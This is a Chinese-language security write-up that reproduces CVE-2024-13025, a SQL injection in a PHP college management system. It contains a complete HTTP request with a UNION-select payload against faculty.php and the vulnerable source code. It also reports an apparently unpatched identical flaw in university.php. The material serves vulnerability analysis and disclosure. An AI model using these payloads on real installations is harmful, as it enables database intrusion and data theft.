Codezips

里面有很多cms系统，其中的一个College Management System In PHP With Source Code存在sql注入漏洞。

复现

对源码进行下载登录。

里面有很多远程js加载不出来但是不影响接口使用。

对于/college-mgmt-php-master/Front-end/faculty.php接口进行测试。
数据包为

POST /college-mgmt-php-master/Front-end/faculty.php HTTP/1.1
Host: localhost
Sec-Fetch-Mode: navigate
Accept-Language: zh-CN,zh;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Cache-Control: max-age=0
Origin: http://localhost
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/x-www-form-urlencoded
Sec-Fetch-Dest: document
Referer: http://localhost/college-mgmt-php-master/Front-end/login.php
sec-ch-ua-mobile: ?0
Cookie: PHPSESSID=40a20a299e19c127ad0ed71b0cf004cb
Sec-Fetch-User: ?1
Sec-Fetch-Site: same-origin
Upgrade-Insecure-Requests: 1
sec-ch-ua-platform: "Windows"
Content-Length: 59

book_name=x'+union+select+NULL,database(),NULL,NULL--+-&book_author=x&search_book=

复现成功，即faculty.php下的book_name/book_author字段存在sql注入。

源码分析

<?php

                  if(isset($_POST['search_book']))
                  {
                    $name=$_POST['book_name'];
                    $author=$_POST['book_author'];

                    $query = "SELECT * FROM book WHERE book_name = '$name' AND author = '$author'";
                    $results = mysqli_query($db, $query);

                    $row = mysqli_fetch_array($results);


                   ?>

在这里面先是判断了search_book字段是否为空，为空则引入book_name和book_author带到sql query里面。
是一个非常经典的无过滤导致sql注入。
CVE-2024-13025分析结束。

0day

经过代码审计，在university.php文件下存在与之前一模一样的漏洞，明显是之前漏洞挖掘者忽略的

使用联合注入即可

风险代码

这段代码是visitor表插入的逻辑，也是页面登录用户的逻辑
利用这个接口，可以绕过前端全部对于邮箱格式、密码长度等检测。属于风险代码。可以导致插入一些风险代码。

可以看到插入成功

此cve 是一个sql注入，同时此cms还有一个sql注入的0day是没有发现的，这里我代码审计进行了补充。同时也存在一定的风险代码问题，需要在代码审计时引起注意。